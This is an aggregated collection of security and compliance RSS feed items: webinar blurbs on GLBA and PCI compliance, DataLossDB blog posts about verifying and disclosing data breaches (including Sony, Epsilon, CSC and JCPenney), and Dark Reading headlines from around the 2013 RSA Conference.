http://www.compliancehome.com/rss/resources-GLBA.xml It has always been a challenge for businesses and organizations of all sizes to manage the security of critical information. Even companies that invest in the latest security infrastructure and tools soon discover that these technology-based solutions are short-lived.

==> Data Loss Prevention not a solution

http://www.compliancehome.com/rss/resources-GLBA.xml One of the powerful tools that many organizations are using to prevent the unauthorized copying or transmission of confidential or personal data is Data Loss Prevention (DLP). Organizations spend a tremendous amount of money and time to set up firewalls and intrusion detection solutions to prevent attackers from the outside from gaining access to internal assets. However, what about the internal threat? A Web page, an e-mail with a client list, or personal data copied to a USB drive are all examples of data that can leave an organization unmonitored and undetected.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Join this webinar to learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: Protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes Go beyond intrusion detection and prevention to a positive, proactive, security model that protects against new email and web-borne attacks Safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information Implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations

==> Real-Life Log Management Challenges for Financial Institutions

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Email Security and Archiving - Clearer in the Cloud

http://www.compliancehome.com/rss/resources-GLBA.xml The time is NOW for businesses and organizations of all sizes to implement cloud computing solutions for email security and archiving. Cloud computing solutions are more effective than traditional, on-premise solutions and at a fraction of the cost and IT resource requirements. Listen to this live TechRepublic Webcast, featuring moderator Steve Kovsky and featuring special guests Michael Osterman, President of Osterman Research and Adam Swidler with Google. They present findings, regarding the latest research comparing cloud solutions with on-premise solutions.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: Protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes Go beyond intrusion detection and prevention to a positive, proactive, security model that protects against new email and web-borne attacks Safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information Implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations

==> Generating grounds for identity theft

http://www.compliancehome.com/rss/resources-GLBA.xml The federal GLBA, HIPAA, FACTA and its Red Flags and Disposal Rules, state data Breach Notification Laws and hundreds of other federal and state laws and industry regulations like PCI-DSS are intended to protect the privacy and security of consumers personally identifiable and financial information entrusted to businesses and other organizations. Many such regulations aim to prevent identity theft and privacy violations.

==> The Price of Not Complying With GLBA

http://www.compliancehome.com/rss/resources-GLBA.xml The Gramm-Leach-Bliley Act (GLBA) requires financial institutions to create and maintain an information security program to protect customer information. This webcast highlights GLBA and Technology safeguards, the price of not complying, how to identify technology compliance areas, compliance policy and process - who implements and how, and Tripwire GLBA Product/Service offerings.

==> SAS 70 Certification Completed by CRG West

http://www.compliancehome.com/rss/resources-GLBA.xml A developer, manager and operator of data centers, CRG West, has completed SAS (News - Alert) 70 Type II certification at the companys Boston and Chicago data centers. The company believes the completion of this certification process in Boston and Chicago has made the outsourced data center selection process more efficient for prospective customers from all industries.

==> CIO Strategies for Retention and Deletion of Email and Electronic Information

http://www.compliancehome.com/rss/resources-GLBA.xml Over the past two years, major changes to the Federal Rules of Civil Procedure (FRCP) and the increase in state and federal compliance regulations have created new challenges for companies as they struggle to manage email retention and deletion policies. To successfully maintain compliance and protect their business in the event of litigation, companies must understand these changes. Implementing new strategies for email will enable organizations to effectively set and manage email retention and deletion policies, as well as provide robust search and e-Discovery capabilities to respond rapidly to litigation.

==> Improve Performance, Reduce Data Growth Costs - Archiving ERP Applications

http://www.compliancehome.com/rss/resources-GLBA.xml View this Webcast to find out from the experts how effective application archiving can help you effectively manage your production database, control data growth, and ultimately improve your bottom line.

==> Using Email Encryption to Enforce Security Policies for PCI, GLBA & HIPAA Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml Ensuring your organization complies with today's increasingly complex regulations and industry mandates around email and data security can be both a legal and technical mine field.First you need to understand what data should be protected. Then you need to determine who in your organization has access to that data and is sending it to people outside of the organization. You also need to invest in technology to enforce your compliance policies. It can be intimidating for any IT department. Hearing how your peers have tackled these challenges can help you plan your approach to finding a solution. Watch the webinar,

==> Email is Critical...and Out of Control!

http://www.compliancehome.com/rss/resources-GLBA.xml More than 75% of the average company's intellectual property is contained in email messages and their attachments. As a result, email has quickly become the file server of choice for most of us - and a headache for compliance managers.The value of unified information access to live and archived email via desktop or mobile device is becoming increasingly important for today's businesses - from end users to the board room, where compliance is an ongoing pain point.

==> The Top 10 Benefits of SaaS-enabled Email Management

http://www.compliancehome.com/rss/resources-GLBA.xml Email is indisputably the most important business application for most organizations. Yet, managing it has always been a no-win proposition. Add the pressure of fewer people and resources as well as shrinking budgets these days, and it seems that the pain of managing email can only get worse. But don't despair, there's a new breed of managed SaaS-enabled email services that are modular, reliable, and secure for virtually any type of business.

==> Improve Performance, Reduce Data Growth Costs - Archiving ERP Applications

http://www.compliancehome.com/rss/resources-GLBA.xml View this Webcast to find out from the experts how effective application archiving can help you effectively manage your production database, control data growth, and ultimately improve your bottom line.

==> Knock, knock. Who's there? No one.

http://datalossdb.org/incident_highlights.rss As we mentioned in our last post, trying to contact and confirm organizations that have reportedly been breached can be time-consuming and frustrating. When that organization is a hospital and we cannot reach anyone or get a response, it's especially concerning. Yesterday, I tried to contact [Redacted] Hospital. I went to their site for contact info, but they had no phone directory or email directory by department or office. So I called their main number and asked for IT. I was sent to voicemail. I hung up, called back, and asked the operator to stay on the line until I got through to a person in IT or the Privacy Compliance Officer. Eventually, I heard a male voice, who told me that he was the "service desk." The "service desk" was not IT. I subsequently learned that they are an outsourced IT partner. I explained that the hospital had apparently suffered a hack via SQL injection and I could email him a link to the data so that IT could investigate and take action to secure the server better. I gave him my name, email address, and phone number, and told him that I was with the Open Security Foundation. He told me didn't have an email address for me to email him the link, but that he would open a ticket. He had no email address to give me? Seriously? On the one hand, not accepting an emailed link from a stranger makes good security sense, but on the other hand, how could I send them data and details without an email address? I usually paste some dumped data into the body of the email with the link to the full paste. So now, not only could I not directly reach the responsible parties, I could not even send them any data to pursue. The service desk employee opened a ticket and sent me a copy of it. That was almost 24 hours ago. The two individuals he directed the ticket to were the hospital's System Administrator and Technical Analyst, neither of whom have contacted me by email or phone, even though my contact details were in the support ticket. In this case, the data were dumped on the Internet at the beginning of December 2012, so maybe they know already, but since the data are still live and in any event, they have no idea what data I called about, maybe they don't know. The data do not appear to be patient data, but they are personally identifiable information. And if those data were vulnerable, what other data might still be vulnerable? Another staff member from OSF also tried to reach them last night - through the hospital's on-site contact form. That form doesn't have a pull-down menu to direct the message to particular subjects or departments. It shouldn't be so difficult to contact the responsible party when there's been a breach. So here are some "best practices" recommendations for HIPAA-covered entities to add to their checklists: 1. Provide a dedicated phone number and email address to report privacy or security breaches and prominently post those contact details on the home page of your web site. 2. Ensure that the phone number and email address are monitored 24/7/365. 3. Establish a written policy that all such contacts or messages are to be acknowledged within 1 hour. 4. Follow up and let the individual who reported the problem know what steps you have taken. 5. If you use a contact form on your web site, have a pull-down menu for subjects, and have one of them be "Privacy or Security Concern." Every hospital tells patients that they take the privacy and security of their information seriously. I wouldn't believe them if they don't respond to security alerts and make people jump through hoops just to try to inform them that they may have had a breach involving personal information. And I certainly wouldn't believe any hospital that doesn't even return a phone call when you have left them a message that they may have a security problem with their public-facing server. Responsible hospitals should facilitate reporting privacy or data security concerns. So what has your organization done to facilitate reporting of breaches? /Dissent

==> Fool us once, shame on you. Fool us twice, we implement policies!

http://datalossdb.org/incident_highlights.rss It had all the makings of a sexy data breach story. An individual with the Twitter nick of @TibitXimer claimed to have exploited a vulnerability on Verizons server and dumped about 300,000 records out of an estimated 3,000,000 customer records allegedly acquired. ZDNet trumpeted the headline, Exclusive: Hacker nabs 3m Verizon customer records. They reported: "A hacker has posted around 300,000 database entries of Verizon customers to the Web, after exploiting a vulnerability in the cellular giant's network. The hacker, going by the name @TibitXimer on Twitter, told ZDNet earlier this evening that the hack was carried out earlier this year on July 12, which allowed him to gain root access to the server holding the customer data. Tibit gained access to a server with little difficulty after working with another hacker to identify the security flaw." The problem is that although none of it was true, @TibitXimers claims and ZDNets repetition of the claims were repeated all over the Internet. One day later, @TibitXimer was gone from Twitter and a more accurate version of the story started to emerge. In statements to other media outlets such as DataBreaches.net, The Next Web, and Forbes, Verizon spokesperson Alberto Canal explained that Verizons systems had not been breached at all, there was no vulnerability exploited, no root access gained, and that the data dumped were old data from an incident a few months ago. To add insult to the reputation harm that Verizon could have suffered, the incident wasn't even Verizons incident. It turned out that a third party marketing firm that Canal did not name had accidentally leaked a sales lead list and the list had simply been copied and posted at the beginning of August. Most of the names on the list were not even Verizon customers, according to Canal. The same data were re-posted this week and claimed as a new hack. Not such a sexy story anymore, right? And ZDNet is certainly not the only media source to believe a hackers claims that were subsequently determined to be totally untrue. We've been fooled, too, at times, as has Lee Johnstone, who recently had to correct a report on Cyber War News that a hacker named Hannibal had leaked 1,000,000 Facebook account details in retaliation for #OpIsrael. Over the past year, the problem of false claims has reached almost epidemic proportions, which is why, over the past few months, DataLossDB.org started implementing policies requiring us to obtain or at least make a good faith effort to obtain when possible a statement from an allegedly breached entity either confirming, denying, or clarifying and correcting a hackers claims of a breach - *before* we decide whether to add a report to the database. Sometimes, as in this case, it is relatively easy to reach a media contact and get a response. In other cases, particularly with small entities involved in claimed hacks overseas, it is not so easy, and we may send several e-mails that go unanswered before we try to decide whether to include a claimed breach or not. If you login and read individual entries, you may even see a Curators Note in the Comments section indicating that we tried and failed to reach anyone by e-mail to confirm the report. Deciding whether to include a report when we cannot reach anyone is headache-inducing, to say the least, as we realize that with this less than perfect system, entities might suffer reputation harm through no fault of their own. We have therefore also implemented the ability to fully delete entries from the database should we later learn that a claim was totally false. Another policy we recently implemented involves putting (DISPUTED) in the summary line for an incident if there is a real dispute as to whether a breach occurred or not. There may be times when an entity insists they have not been breached but we find the evidence in a data dump to be compelling and decide to include the report. This was the case, for example, in the reported hack of MilitarySingles.com, where they denied it to DataBreaches.net and others, but analysis of the data dump and information still available on their site led us to the decision to include the report. At other times, a reported breach may be part of litigation and where the defendant denies the claims, we may decide to include the report but note it as DISPUTED. Trying to confirm the numerous claimed hacks that appear on Pastebin or other sites on a daily basis is a time-consuming process that slows us down in providing timely reports and has put even more pressure on our resources that are already constrained. However, we believe that it needs to be done to ensure data quality. And so, as 2012 draws to a close, we have already added over 1,400 incidents (and that number does not include the Fringe incidents) for the year, but there are hundreds more still to process. Whatever number you see on the Stats page for December 31st will likely be significantly under our real total for the year until we can catch up. On that note, I wish you all a Happy and Healthy 2013. And lets hope that next year, things slow down for us! /Dissent

==> Is A Data Breach A Life Or Death Situation?

http://datalossdb.org/incident_highlights.rss Most people would agree that security is important; however, many would have a hard time saying that a data breach could be a life or death situation. Sadly, in the past few weeks there have been two cases that may qualify for that characterization in the news. The first case is the data breach at King Edward VII Hospital on December 4, 2012. Two Australian radio show hosts prank called the hospital in a joking attempt to get information on the condition of the Duchess of Cambridge. To their surprise the nurse, who answered the phone, fell for the hoax and provided them with information on the Duchess's condition and care. Last Friday, Jacintha Saldanha, the 46 year old nurse who provided the information, committed suicide just two days after news of the breach was released. The second case involves a data breach that occurred September 28, 2012 at the University of Georgia. A former student gained unauthorized access to a server containing 8,500 former and current employees' names, Social Security numbers, and other sensitive information. Still in the midst of investigation, police announced on Tuesday that Charles Stapler Stell, the 26 year old behind the data breach, passed away with no indication of foul play and most likely the result of suicide. In these two cases, the data breaches and their consequences appeared to have pushed these individuals into a life or death decision. As the importance of privacy and security breaches increases, we have now seen there are potential ramifications to the people involved, more than just notification and credit monitoring. As breaches unfortunately become more commonplace, organizations impacted should ensure that they not only have a response plan for dealing with the incident, but also how to constructively handle any employees at fault. While discipline from HR may be on the agenda, organizations need to ensure the wellbeing of their employees as they process their actions. References: http://www.bizjournals.com/atlanta/news/2012/12/11/uga-dead-former-student-responsible.html http://www.telegraph.co.uk/news/9730305/Statement-from-the-King-Edward-VIIs-Hospital-on-the-death-of-nurse-Jacintha-Saldanha.html

==> Behind the scenes of doing the right thing

http://datalossdb.org/incident_highlights.rss From time to time, the Open Security Foundation is contacted about security vulnerabilities and data breaches that have yet to be made public. We always strive to handle each report in the most appropriate way possible and wanted to share with you an example from last year. In March of 2011, we had a breach anonymously submitted to DataLossDB without any further way to contact the submitter, but enough information for us to work on verifying and relaying the issue to the affected company. From the initial look of things, it appeared that job applicants' names, addresses, phone numbers, email addresses, and resumes were accessible and even editable on the Computer Sciences Corp (CSC) website without requiring a login. You could browse to their resume website and increment the ResumeID=x field in the URL making it trivial to enumerate and access approximately 300 applicants personal information. We contacted CSC as soon as the incident was submitted to see if they would speak to us or at least provide a response. At first it appeared that they ignored our emails and we were getting a bit concerned as several days went by without a response. However, once we escalated to a phone call, we were then able to discuss the issue with the proper contacts and the vulnerability was fixed within 48 hours. We also spoke with their lawyer and they stated that they would notify those affected and get back to us with a statement. Here is the statement from CSC: ---------------------- Original Message ---------------------- Last month, CSC was contacted by Open Security Foundation ("OSF") who had received an anonymous tip that an Internet-accessible Web site CSC had set up for a recruiting effort had security issues. Upon internal investigation, it was determined that the site created in 2006 was unintentionally architected in such a way as to allow for url manipulation once a person created a profile for themselves, giving them the ability to see other person's resume information. CSC has no evidence that anyone other than the original anonymous tipster and those associated with OSF actually had access to resume information. This site was not properly de-provisioned and remained accessible until 2011 (although the last resume received was in September 2010). The contents, however, were not indexed or searchable by Google. There were approximately 300 profiles created with varying amounts of personal information provided. Although CSC did not ask for or require birth dates or Social Security Numbers, eight people provided either one or both. One person provided the last four digits of a SSN. CSC will provide formal notification as required by state law. In addition, where there is no state requirement, CSC will nonetheless send letters to inform everyone about the vulnerability.
Due to our delay, we have just now pushed this incident live and wanted to thank the anonymous submitter for providing us the information so we could responsibly report it and to CSC for responding to the breach appropriately. To be clear, after we spoke with CSC on the phone and were able to get connected to the right people they responded promptly, did a thorough investigation, and then to our knowledge notified everyone. Our delay in posting this update and pushing the incident live in no way is an indication one way or the other about CSC. In fact, it just highlights the continued challenges for the Open Security Foundation to keep up with the massive amount of breaches that continue to occur every day. In addition, we thought we would post this particular example to share some of the work that happens behind the scenes at OSF, that many people would never know exists. Coordinating with organization such as this can take a great deal of time and patience on both sides. Whenever possible and practical we do go out of our way to alert entities to breaches, but at other times we unfortunately just have to post the breach. We would love to contact all entities to confirm they are aware of the incident and offer assistance but this is not possible. For example, while we may from time to time we dont typically contact organizations for breaches when the data is posted publicly such as when information is dumped to Pastebin or other paste sites. Unfortunately, we do not have sufficient staff to always do that and some sites do not make it easy to contact them. We would love to be able to do more with the project, but unfortunately just have not been able to get the support or volunteers required. Moving forward, we will be making changes with the project to help ensure our future. This will begin with a new partnership with Risk Based Security, which will be able to bring more resources to better support the project and continue our research.

==> Sony had HOW many breaches?

http://datalossdb.org/incident_highlights.rss We thought keeping track of entities involved in the Epsilon breach was tough, but the recent spate of attacks on Sony networks has us working overtime trying to update the database. Thankfully, Jericho provided yeoman service and compiled a hyperlinked chronology of recent developments. The Sony breaches have generated a lot of discussion. Some of it has centered on Sony's shocking failure to encrypt passwords and it being all-too-vulnerable to SQLi compromises (if those posting the data publicly are accurate as to how they compromised certain databases). Sony undoubtedly has a lot of explaining to do if it hopes to have future assertions of industry-standard security taken seriously. To date, the two largest incidents affected over 100 million records. But were the PSN and Sony Online Entertainment (SOE) attacks two separate incidents or were they really one breach? Should DataLossDB.org have recorded one breach with over 100 million affected, or two incidents involving 77 million and 24.6 million, respectively? Or should we just treat the last 45 days' incidents as one #EPIC #FAIL and one big incident? In light of our mission to track unique breaches, the question is not trivial. When news of the second incident broke, the first thought was to update the PSN entry and add another 24.6 million to that counter. But as more details emerged, it seemed clear that we should treat it as a separate incident. The attack had occurred on different days than the PSN attack, the data compromised were on different networks, it seems quite likely the different networks had different security measures involved (Sony later testified that databases with credit card data were treated with higher security), we did not know if the same individuals were involved in both attacks, and the company itself was reporting it as a second incident previously unknown to them and not as an update to the other breach. Our impression that these were two unique incidents was subsequently supported by the reports made to the New Hampshire Attorney General's Office for each incident (here and here). Despite what we thought was an accurate way to track these breaches, one commenter to DataLossDB.org questioned our decision to treat the reports as two unique incidents. A researcher with Javelin Strategy commented that treating this as two incidents instead of one benefited Sony: they would not appear ranked 2nd in our list of all-time largest breaches on our home page. Since these incidents had the same parent corporation, he suggested, they should be treated as one aggregated incident. While those points may appear reasonable to some, we find them unpersuasive. First, we do not make decisions based on whether an entity benefits or suffers from a particular decision. We make decisions based on whether the available information supports aggregating the data for a particular incident or not. In this case, although it is the same parent corporation, the available information does not support aggregation. In other cases, such as a Wellpoint breach that was initially entered as distinct incidents, when my research revealed that there was only one incident and that what appeared to be a second incident was really due to Wellpoint's vendor not fully securing the web sites after the first report, I recommended that those incidents be combined, and they will be. But other than a common target - Sony - where is there any evidence that this was just one incident? There is none. We recognize that not everyone will agree with our decision, and that's fine. Should new information become available that suggests that a one-incident approach is more appropriate for these incidents, we will edit our entries. As always, we welcome constructive thoughts about how to make the database more useful to stakeholders, but we do not expect all of our decisions to please everyone.

==> Epsilon Bingo

http://datalossdb.org/incident_highlights.rss By now, everyone has probably read about a company named Epsilon. In fact, most people likely have second hand involvement, receiving one or more emails from companies you do business with warning you to be very careful after a recent incident. Most of these companies have used a similar form letter explaining the concerns and that you should be "cautious of phishing e-mails, where the sender tries to trick the recipient into disclosing confidential or personal information." These notifications stem from Epsilon, a managed e-mail broadcasting company, getting compromised and having all of their customer e-mail addresses copied. We have received a few emails from people asking us how we could have missed the Epsilon breach and why it isn't on our site. Well, it actually is on the site as we do follow incidents such as this, however, it is listed as a Fringe incident. Why Fringe? From what we can tell so far, the breach (while unacceptable) is contained to Names and Email Addresses. We do recognize that this information may increase the risk to customers as targeted spearphishing attempts may be more successful, however, there is no loss of PII. We have debated this topic for years and instead of not including them in DataLossDB, they are now just labeled Fringe. There will be more debate on the severity of this incident for sure. Some think it is critical and others merely say that their email address was never meant to be private anyways. There are good arguments supporting both sides of the debate. We will be continuing to add all of the affected organizations as we learn about them, and you can see the incident here: http://datalossdb.org/incidents/3540 When Epsilon posted the notice on their site they mentioned: "On March 30th, an incident was detected where a subset of Epsilon clients' customer data were exposed by an unauthorized entry into Epsilon's email system." As on April 4th, they have now have updated the definition of subset to mean "The affected clients are approximately 2 percent of total clients and are a subset of clients for which Epsilon provides email services." As of today, we are aware of a little over 40 companies affected and more notices are pouring in from users. As to how many users are impacted that is anyones guess. Our guess is A LOT. If you want to read some of the notices we have received, over a dozen are on our mailing lists archives: http://lists.osvdb.org/pipermail/dataloss/2011-April/thread.html For those that want to play along, we have decided to make some Epsilon Bingo Cards. If you are able to fill up a whole card and prove it with the notices we might have to give you a prize... that is the least we could do, right? As always, please keep sending us any notices that we are missing so that we may better gauge the scope of this incident and update the cards.

==> The DataLossDB project welcomes Dissent!

http://datalossdb.org/incident_highlights.rss The Open Security Foundation is pleased to announce that Dissent, the publisher and maintainer of DataBreaches.net and PHIprivacy.net has now joined DataLossDB as a curator for the project. OSF has worked with Dissent over the years and she is already known to us a DataLoss Archaeologist, as she took third place in our Oldest Incident contest. She found the 1984 TRW incident, where computer hackers gained access to a system holding credit histories of some 90 million people which happens to be the 3rd largest breaches of all time in DataLossDB. Her more active involvement with the project on a day-to-day basis will help us remain the most complete archive of dataloss incidents world-wide and will enhance our ability to keep current on more breaches in a timely manner. Dissent will continue to maintain her own web sites as a resource on breach news and issues. For those who do not know Dissent, she's a practicing health care professional with a special concern for health care sector breaches, and we expect to see increased coverage of medical sector breaches in the database in months to come. As Dissent notes, "With recent changes to federal laws making more information available to us about health care sector breaches, we are now beginning to get some sense of how common these breaches are and the common breach types. Including these incidents in the database will enable analyses that would not have been possible or meaningful just a few years ago." Open Security Foundations CEO, Jake Kouns says, Dissent has been a supporter of DataLossDB from the very beginning and is an extremely dedicated and thorough researcher. We are extremely fortunate to have her as part of the DataLossDB team and look forward to working more closely with her. Welcome Dissent, our newest curator and resident research queen!

==> Open Security Foundation Announces New Advisory Board

http://datalossdb.org/incident_highlights.rss As security vulnerabilities and data loss incidents become a regular occurrence, the Open Security Foundation has grown from supporting a single project in 2004 to a leading provider of filtering through security information and providing notifications and aggregation for data for data loss and cloud security incidents. The Open Security Foundation has evolved into one of the most utilized resources in providing security information, and as a 501c3 non-profit organization relies heavily on public contributions, volunteer effort and corporate sponsorships. The growing demand for information to provide proper risk management has led to additional projects and now the introduction of an advisory board consisting of industry professionals to lend their expertise in areas to keep OSF moving in a positive direction and to be the first line of access to all that require their service. Open Security Foundation CEO and founder Jake Kouns stated, This is a very important step in shaping the future of the Open Security Foundation. OSF has reached a point in growth that requires a strategic move to provide longevity and sustainability. It has always been a goal of this organization to provide our work to the broadest audience and the introduction of the advisory board will contribute to that objective. I am extremely proud to be part of such an amazing organization that has built a reputation of excellence and serves a very important function, adds Kouns. We put out a call for qualified individuals that could provide guidance and insight to keep OSF a leader in the security information arena. The results of our search far exceeded our highest expectations; its not only provides us with confidence in our direction, but the impact OSF has had on the industry. The new advisory board members comprises of an array of specific industries that understand the importance of OSF resources. Each member was chosen for a specific contribution to ultimately achieve the objective and mission of this foundation and capable of providing broad based perspective on information security, business management and fundraising. Tom Srail, Senior VP Willis Group provides 19 years of experience in the insurance industry with an expertise in risk consulting, professional liabilities, network security risks, intellectual property and technology professional risks. Shawn Andreas, VP Marketing Guard Dog Inc.(GRDO.PK) will contribute his 20 years of experience in marketing and brand awareness to remake OSF to be more consumer and market friendly focusing on fundraising and sponsorships opportunities. His expertise in marketing spans over diverse markets and includes opportunities working with some of the countrys top companies including GM, Apple, Viacom and more. Jim Hietala VP, Security for a leading IT standards organization, manages all security and risk management programs. Mr. Hietala is a frequent speaker at industry conferences. In addition he has published numerous articles on information security, risk management and compliance topics. Daniel E. Geer, Jr. Sc.D. Chief Information security officer In-Q-Tel Washington. Mr. Geer has a list of accomplishments including participation in government advisory roles for the Federal Trade Commission, the Departments of Justice and Treasury, the National Academy of Sciences, the National Science Foundation, the US Secret Service, the Department of Homeland Security, and the Commonwealth of Massachusetts. Andrew Lewman, Executive Director The Tor Project, Inc. Andrew Lewman is the Executive Director of The Tor Project, a non-profit organization. Mr. Lewman worked on projects with the National Science Foundation, Internews Network, Freedom House, Google, Broadcasting Board of Governors, National Network to End Domestic Violence, and the US State Department. In addition to the advisory board, OSF also announces new leadership positions with the organization. We are pleased to announce that Becky Chickering and Corey Quinn are now curators for the DataLossDB project. We want to thank everyone that contacted OSF to volunteer their time and skills for the advisory board and flexibility as we went through this process. During our conversations with potential members we spoke with several passionate individuals that have a great deal to offer OSF. We plan to continue to expand our leadership team and are always looking for volunteers to help the organization.

==> Open Security Foundation Launches New Cloud Security Project

http://datalossdb.org/incident_highlights.rss The Open Security Foundation, providing independent, accurate, detailed, current, and unbiased security information to professionals around the world, announced today that it has launched Cloutage (cloutage.org) that will bring enhanced visibility and transparency to Cloud security. The name Cloutage comes from a play on two words, Cloud and Outage, that combine to describe what the new website offers: a destination for organizations to learn about cloud security issues as well as a complete list of any problems around the globe among cloud service providers. The new website is aimed at empowering organizations by providing cloud security knowledge and resources so that they may properly assess information security risks related to the cloud. Cloutage documents known and reported incidents with cloud services while also providing a one-stop shop for cloud security news and resources. When speaking with individuals about the cloud, to this point it has been a very emotional conversation. People either love or hate the cloud, says Jake Kouns, Chairman, Open Security Foundation. Our goal with Cloutage is to bring grounded data and facts to the conversation so we can have more meaningful discussions about the risks and how to improve cloud security controls. Cloutage captures data about incidents affecting cloud services in several forms including vulnerabilities that affect the confidentiality and integrity of customer data, automatic update failures, data loss, hacks and outages that impact service availability. Data is acquired from verifiable media resources and is also open for community participation based on anonymous user submissions. Cloud solution providers are listed on the website and the community can provide comments and ratings based on their experiences. Cloutage also features an extensive news service, mailing lists and links to organizations focused on the secure advancement of cloud computing. The nebulous world of cloud computing and the security concerns associated with it confuses many people, even IT and security professionals," says Patrick McDonald, a volunteer on the Cloutage project. "We want a clearinghouse of information that provides a clear picture of the cloud security issues."

==> JCPenney has dodged a huge bullet... until now.

http://datalossdb.org/incident_highlights.rss Now being reported in the mainstream media, JCPenney was "Company A" in the recently infamous Albert Gonzalez trial. In court filings, we found some attachments that seem to have been a convincing factor in the judges decision to unseal the identity of "Company A", a.k.a JCPenney. JCP fought hard to keep its identity concealed, but ultimately it would seem that these attachments, as well as some reporting by Evan Schuman made the difference. Attachment A, filed in document 14 of the case (for those following the case on PACER, etc.), shows ICQ chat extracts where Gonzalez and a co-conspirator discuss JCPenney. It is damning from a security professionals point of view. It would seem almost irrefutable that JCPenney was compromised. How many cards were stolen are unknown, but cards were almost undoubtedly stolen and JCPenney has (until now) seemingly dodged a huge public relations bullet. Below is a snippet from the attachment: * Gonzalez: "what did hacker 2 say about jcp?" * Conspirator: "he hacked 100+ sqls inside and stopped" * Gonzalez: "hacker 2 told me he found a place to snif for dumps in jcp" * Gonzalez: "i see, hacker 2 showed you anything?" Gonzalez then posts what appears to be names and credit card details (redacted in the court docs). They then go on to talk about how one of the conspirators had "domain admin" access, suggesting that they pretty much had control of everything in the given network (depending on topology and segregation). We struggled with a possible JCPenney incident before reading this document. We initially categorized it as "fringe", but it seems pretty obvious at this point that JCPenney was either: 1. 1) just hacked or 2. 2) hacked badly enough to expose card data But judge for yourself: here's the attachment and the full pdf we obtained (including the attachment) for context. If you use these, please credit the Open Security Foundation for buying these and making them public -- you don't have to as they are public record, but we did have to pay for them, so we'd appreciate the credit!

==> The Great Lie of Compliance

http://www.darkreading.com/rss/all.xml If you believe you are fully compliant, then you are not

==> Ponemon Prognosis Shows State of Cloud Security Improvements

http://www.darkreading.com/rss/all.xml Incremental improvements in risk assessments and data protection in the cloud, but access control issues abound

==> Secure Development: Must-Do Or Money Pit?

http://www.darkreading.com/rss/all.xml At the RSA Conference, two software security specialists debate over whether the cost of secure programming is too much for most companies, recommending simple steps to improve development

==> White House Cybersecurity Czar: New Executive Order A 'Down Payment'

http://www.darkreading.com/rss/all.xml Michael Daniel says President Obama's Executive Order on Cybersecurity sets the stage for cybersecurity legislation for protecting critical infrastructure

==> BlackBerry Can Set EMM Standard With BES 10

http://www.darkreading.com/rss/all.xml The need for the BlackBerry Enterprise Server that's still in almost all large organizations has been declining, but BES 10 changes everything. Instead of being a legacy server to manage legacy phones, BES 10 can be the central console for managing all mobile devices

==> Governance Without Metrics Is Just Dogma

http://www.darkreading.com/rss/all.xml Entertaining RSA Conference panel titled 'Why U No Haz Metrics' discusses the importance of measuring security controls against exposure to loss

==> Desktops-As-A-Service Boost Security, But Beware

http://www.darkreading.com/rss/all.xml At RSA session, panelists argue that companies can better protect sensitive data and systems by using virtual desktop infrastructure, but warn that everything relies on the quality of the hypervisor

==> Using DevOps To Upgrade Application Security

http://www.darkreading.com/rss/all.xml The techniques of the DevOps movement designed to bring developers and IT operations into closer alignment for more agility can also be a huge boon for app sec, RSA panelists say

==> Sharpening Endpoint Security

http://www.darkreading.com/rss/all.xml Some tips on how to protect the most vulnerable parts of your IT infrastructure: the endpoints and the unpredictable users who control them

==> Evernote Resets Everyone's Passwords After Intrusion

http://www.darkreading.com/rss/all.xml After detecting a coordinated intrusion into their network, Evernote forced a system-wide password reset today. The attackers were able to access Evernote user information, which includes usernames, email addresses associated with Evernote accounts and encrypted passwords

==> Tale Of Two Compromises Provides Lessons For SMBs

http://www.darkreading.com/rss/all.xml The stories behind the hacking of a startup's CEO and a journalist, as told at the RSA Conference, provides small and midsize businesses with good tactics to secure their businesses

==> Researchers Solicit Sinkhole-Sharing Among Researchers

http://www.darkreading.com/rss/all.xml Dell SecureWorks researchers will provide their homegrown tools in open source to researchers from other companies and organizations

==> Cool Tech's First Showing At RSA Conference 2013

http://www.darkreading.com/rss/all.xml Meet five unsung heroes that showcased their new solutions at the RSA Conference. You may find something you didn't know you needed

==> A Vulnerability Disclosure Game Changer

http://www.darkreading.com/rss/all.xml Two new ISO standards will push third-party developers, online service providers and even hardware vendors to stop ignoring vulnerability disclosures

==> Open Public Wi-Fi: How To Stay Safe

http://www.darkreading.com/rss/all.xml One day our systems will be built to default always to secure configurations, but we're not there yet

==> Defending Local Administrator Accounts

http://www.darkreading.com/rss/all.xml One compromised desktop is all is usually takes for complete network ownership by an attacker; local admin accounts are often the mechanism for that escalation

==> 5 Lessons From The FBI Insider Threat Program

http://www.darkreading.com/rss/all.xml Finding ways to improve enterprise insider theft detection and deterrence

==> FBI Director: ID And Deter Attackers 'Behind The Keyboards'

http://www.darkreading.com/rss/all.xml Finding LulzSec's 'Sabu' a prime example of tracking down cybercriminals, official tells RSA Conference 2013 attendees

==> SCADA 'Sandbox' Tests Real-World Impact Of Cyberattacks On Critical Infrastructure

http://www.darkreading.com/rss/all.xml New testbeds would help operators test software patches as well

==> Threat Intel Disclosure for Profit, or Progress?

http://www.darkreading.com/rss/all.xml Tom Parker weighs the pros and cons of Mandiant's recent intelligence disclosure.

==> The Best Way To Spend Your Security Budget

http://www.darkreading.com/rss/all.xml One SQL injection attack can bring in big bucks. It's a no-brainer that you should make this problem top priority

==> Pentagon Unveils Secure Mobile Device Plan

http://www.darkreading.com/rss/all.xml Military releases a new plan to accelerate the adoption of mobile devices and apps for both classified and unclassified use

==> China's Cyberespionage Will Continue Unabated, Say Experts

http://www.darkreading.com/rss/all.xml The U.S. government will be slow to act against aggressors who attack through the Internet, predict policy and China experts at RSA

==> HP Launches Big Data Security Products, Threat Research

